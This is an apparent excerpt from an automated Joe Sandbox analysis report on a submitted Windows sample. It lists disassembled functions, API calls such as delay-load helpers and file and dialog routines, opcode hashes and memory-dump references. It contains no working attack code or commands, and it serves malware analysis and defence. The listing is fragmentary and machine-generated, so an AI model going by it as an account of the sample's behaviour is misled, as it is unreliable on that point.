                                                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1269201914-0
                                                                                                                                                                          • Opcode ID: a674cbff928c80dc6a40459479f5f515f90c98b86d4c3b387e8dcf226fcab87a
                                                                                                                                                                          • Instruction ID: dea4ec407ff40d87b2348f221076a4acfaa017f4a95798caa94e2f9e2ae1826a
                                                                                                                                                                          • Opcode Fuzzy Hash: a674cbff928c80dc6a40459479f5f515f90c98b86d4c3b387e8dcf226fcab87a
                                                                                                                                                                          • Instruction Fuzzy Hash: 95A012E115C101BC310511001C02C3712CDC0C0B1173044DFF821950C0684048050432
                                                                                                                                                                          Function 00B3E40A Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00B3E3FC
                                                                                                                                                                            • Part of subcall function 00B3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B3E8D0
                                                                                                                                                                            • Part of subcall function 00B3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B3E8E1
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1269201914-0
                                                                                                                                                                          • Opcode ID: 9a35c0d787a7f47e3c3dc8a663122e730481908e6d0da234ab83ad15a1a90cf8
                                                                                                                                                                          • Instruction ID: dea4ec407ff40d87b2348f221076a4acfaa017f4a95798caa94e2f9e2ae1826a
                                                                                                                                                                          • Opcode Fuzzy Hash: 9a35c0d787a7f47e3c3dc8a663122e730481908e6d0da234ab83ad15a1a90cf8
                                                                                                                                                                          • Instruction Fuzzy Hash: 95A012E115C101BC310511001C02C3712CDC0C0B1173044DFF821950C0684048050432
                                                                                                                                                                          Function 00B3E446 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00B3E3FC
                                                                                                                                                                            • Part of subcall function 00B3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B3E8D0
                                                                                                                                                                            • Part of subcall function 00B3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B3E8E1
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1269201914-0
                                                                                                                                                                          • Opcode ID: f9d30d16dfa99f16f7ba76004c9fe857eaa4b707a27160bed0e771ec3b0609ba
                                                                                                                                                                          • Instruction ID: dea4ec407ff40d87b2348f221076a4acfaa017f4a95798caa94e2f9e2ae1826a
                                                                                                                                                                          • Opcode Fuzzy Hash: f9d30d16dfa99f16f7ba76004c9fe857eaa4b707a27160bed0e771ec3b0609ba
                                                                                                                                                                          • Instruction Fuzzy Hash: 95A012E115C101BC310511001C02C3712CDC0C0B1173044DFF821950C0684048050432
                                                                                                                                                                          Function 00B3E5A2 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00B3E580
                                                                                                                                                                            • Part of subcall function 00B3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B3E8D0
                                                                                                                                                                            • Part of subcall function 00B3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B3E8E1
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1269201914-0
                                                                                                                                                                          • Opcode ID: 07b938f2ea3441170a2bdea67fa65f2e698e8ad6408d98c6dd6a9f80478c7d25
                                                                                                                                                                          • Instruction ID: 151a6fbb751e135c418e6e137a79b23e2c64c6f78412def130f234dda6c33b15
                                                                                                                                                                          • Opcode Fuzzy Hash: 07b938f2ea3441170a2bdea67fa65f2e698e8ad6408d98c6dd6a9f80478c7d25
                                                                                                                                                                          • Instruction Fuzzy Hash: 2AA024C555C101FC300411501C03C3711CDC0C0F1573144DFFC31C10C07C404C040430
                                                                                                                                                                          Function 00B3E58E Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00B3E580
                                                                                                                                                                            • Part of subcall function 00B3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B3E8D0
                                                                                                                                                                            • Part of subcall function 00B3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B3E8E1
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1269201914-0
                                                                                                                                                                          • Opcode ID: 4f8734a852e00108fe44426eaa921dc82660bf7b2adf3fe93ecc88d80398b851
                                                                                                                                                                          • Instruction ID: 151a6fbb751e135c418e6e137a79b23e2c64c6f78412def130f234dda6c33b15
                                                                                                                                                                          • Opcode Fuzzy Hash: 4f8734a852e00108fe44426eaa921dc82660bf7b2adf3fe93ecc88d80398b851
                                                                                                                                                                          • Instruction Fuzzy Hash: 2AA024C555C101FC300411501C03C3711CDC0C0F1573144DFFC31C10C07C404C040430
                                                                                                                                                                          Function 00B3E573 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00B3E580
                                                                                                                                                                            • Part of subcall function 00B3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B3E8D0
                                                                                                                                                                            • Part of subcall function 00B3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B3E8E1
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1269201914-0
                                                                                                                                                                          • Opcode ID: b53860704c7e258c77856a3b60db77e5499a8bb4a7dcce9c9c9db7a9b0f2ad67
                                                                                                                                                                          • Instruction ID: 40ce6b2561751e4cc353d15eecfc6d182015c79b9d45e9bc53a41c2a12db505a
                                                                                                                                                                          • Opcode Fuzzy Hash: b53860704c7e258c77856a3b60db77e5499a8bb4a7dcce9c9c9db7a9b0f2ad67
                                                                                                                                                                          • Instruction Fuzzy Hash: 7EA012C55941007C300411601C02C3715CDC0D0B1673141DFF820910C0784049040430
                                                                                                                                                                          Function 00B3E569 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00B3E51F
                                                                                                                                                                            • Part of subcall function 00B3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B3E8D0
                                                                                                                                                                            • Part of subcall function 00B3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B3E8E1
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1269201914-0
                                                                                                                                                                          • Opcode ID: 3ed75346769c125640d0e8c59347f3307e68fe6a0f686f5fb3a87a34db78a0d7
                                                                                                                                                                          • Instruction ID: 340db07c7e6d9aac6d9af025746cdbbca7266cfdf41e694f84fb89415f012559
                                                                                                                                                                          • Opcode Fuzzy Hash: 3ed75346769c125640d0e8c59347f3307e68fe6a0f686f5fb3a87a34db78a0d7
                                                                                                                                                                          • Instruction Fuzzy Hash: 36A012C1558101BC300411001C12C3B158DC0C2F1573044DFF821800C078404C450430
                                                                                                                                                                          Function 00B3E555 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00B3E51F
                                                                                                                                                                            • Part of subcall function 00B3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B3E8D0
                                                                                                                                                                            • Part of subcall function 00B3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B3E8E1
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1269201914-0
                                                                                                                                                                          • Opcode ID: 9dd97e15a9157847b483003d8915050ea7e0ebc3a6be982f1bcc78d0e94ba8ed
                                                                                                                                                                          • Instruction ID: 340db07c7e6d9aac6d9af025746cdbbca7266cfdf41e694f84fb89415f012559
                                                                                                                                                                          • Opcode Fuzzy Hash: 9dd97e15a9157847b483003d8915050ea7e0ebc3a6be982f1bcc78d0e94ba8ed
                                                                                                                                                                          • Instruction Fuzzy Hash: 36A012C1558101BC300411001C12C3B158DC0C2F1573044DFF821800C078404C450430
                                                                                                                                                                          Function 00B3E55F Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00B3E51F
                                                                                                                                                                            • Part of subcall function 00B3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B3E8D0
                                                                                                                                                                            • Part of subcall function 00B3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B3E8E1
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1269201914-0
                                                                                                                                                                          • Opcode ID: abfea2eca2760262fbfb2d4362c7a4661c0a61186ddb559d53da8ce3296edf61
                                                                                                                                                                          • Instruction ID: 340db07c7e6d9aac6d9af025746cdbbca7266cfdf41e694f84fb89415f012559
                                                                                                                                                                          • Opcode Fuzzy Hash: abfea2eca2760262fbfb2d4362c7a4661c0a61186ddb559d53da8ce3296edf61
                                                                                                                                                                          • Instruction Fuzzy Hash: 36A012C1558101BC300411001C12C3B158DC0C2F1573044DFF821800C078404C450430
                                                                                                                                                                          Function 00B3E541 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00B3E51F
                                                                                                                                                                            • Part of subcall function 00B3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B3E8D0
                                                                                                                                                                            • Part of subcall function 00B3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B3E8E1
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1269201914-0
                                                                                                                                                                          • Opcode ID: 79659037e424db1da3d9afd408eea86128030550cf1e5a6d6b6c58a498ad7816
                                                                                                                                                                          • Instruction ID: 340db07c7e6d9aac6d9af025746cdbbca7266cfdf41e694f84fb89415f012559
                                                                                                                                                                          • Opcode Fuzzy Hash: 79659037e424db1da3d9afd408eea86128030550cf1e5a6d6b6c58a498ad7816
                                                                                                                                                                          • Instruction Fuzzy Hash: 36A012C1558101BC300411001C12C3B158DC0C2F1573044DFF821800C078404C450430
                                                                                                                                                                          Function 00B29F09 Relevance: 1.5, APIs: 1, Instructions: 7fileCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • SetEndOfFile.KERNELBASE(?,00B2903E,?,?,-00000870,?,-000018B8,00000000,?,-000028B8,?,00000800,-000028B8,?,00000000,?), ref: 00B29F0C
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: File
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 749574446-0
                                                                                                                                                                          • Opcode ID: 7dfb2440fd50102c8375205df02a004d3d944328e1f39feea00e03ed909c15c0
                                                                                                                                                                          • Instruction ID: 00f45c3d248daa2a57dc7c7f206613c689e55f678dcb5b0056593265662c12cd
                                                                                                                                                                          • Opcode Fuzzy Hash: 7dfb2440fd50102c8375205df02a004d3d944328e1f39feea00e03ed909c15c0
                                                                                                                                                                          • Instruction Fuzzy Hash: 9DA0113008020A8A8E002B30CA0820E3B20EB20BC230802E8A00ACB0A2CB22880B8A00
                                                                                                                                                                          Function 00B3AC04 Relevance: 1.5, APIs: 1, Instructions: 5COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • SetCurrentDirectoryW.KERNELBASE(?,00B3AE72,C:\Users\user\Desktop,00000000,00B6946A,00000006), ref: 00B3AC08
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CurrentDirectory
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1611563598-0
                                                                                                                                                                          • Opcode ID: 3e81ed36d026ce04f1d912173268b675e1cdd67317ba0b2fc05ccdb9f62fa631
                                                                                                                                                                          • Instruction ID: 1427b64a81142d99e782584e11be39e125ae0527235abbb2f40b3abcc9729133
                                                                                                                                                                          • Opcode Fuzzy Hash: 3e81ed36d026ce04f1d912173268b675e1cdd67317ba0b2fc05ccdb9f62fa631
                                                                                                                                                                          • Instruction Fuzzy Hash: FAA011302002008B82000B328F0AA0EBAAAAFA2B82F00C028A00080230CB30C820AA00
                                                                                                                                                                          Function 00B29620 Relevance: 1.3, APIs: 1, Instructions: 30COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • CloseHandle.KERNELBASE(000000FF,?,?,00B295D6,?,?,?,?,?,00B52641,000000FF), ref: 00B2963B
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CloseHandle
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2962429428-0
                                                                                                                                                                          • Opcode ID: 8b0539d74721852d70503917bee021e0b1c28828d37e6c7eb7e01c7669c33219
                                                                                                                                                                          • Instruction ID: b70d7e7ed5786ad65283778c9d3dbf8f6cbd572dfe2800e322b2056cf6741fc5
                                                                                                                                                                          • Opcode Fuzzy Hash: 8b0539d74721852d70503917bee021e0b1c28828d37e6c7eb7e01c7669c33219
                                                                                                                                                                          • Instruction Fuzzy Hash: 4DF0E930081B259FDB328E24D44879277E8EB12321F041F9ED0EE439E0D765698D9A40

                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                          Function 00B3C220 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 286timewindowfileCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00B21316: GetDlgItem.USER32(00000000,00003021), ref: 00B2135A
                                                                                                                                                                            • Part of subcall function 00B21316: SetWindowTextW.USER32(00000000,00B535F4), ref: 00B21370
                                                                                                                                                                          • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 00B3C2B1
                                                                                                                                                                          • EndDialog.USER32(?,00000006), ref: 00B3C2C4
                                                                                                                                                                          • GetDlgItem.USER32(?,0000006C), ref: 00B3C2E0
                                                                                                                                                                          • SetFocus.USER32(00000000), ref: 00B3C2E7
                                                                                                                                                                          • SetDlgItemTextW.USER32(?,00000065,?), ref: 00B3C321
                                                                                                                                                                          • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 00B3C358
                                                                                                                                                                          • FindFirstFileW.KERNEL32(?,?), ref: 00B3C36E
                                                                                                                                                                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00B3C38C
                                                                                                                                                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 00B3C39C
                                                                                                                                                                          • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00B3C3B8
                                                                                                                                                                          • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00B3C3D4
                                                                                                                                                                          • _swprintf.LIBCMT ref: 00B3C404
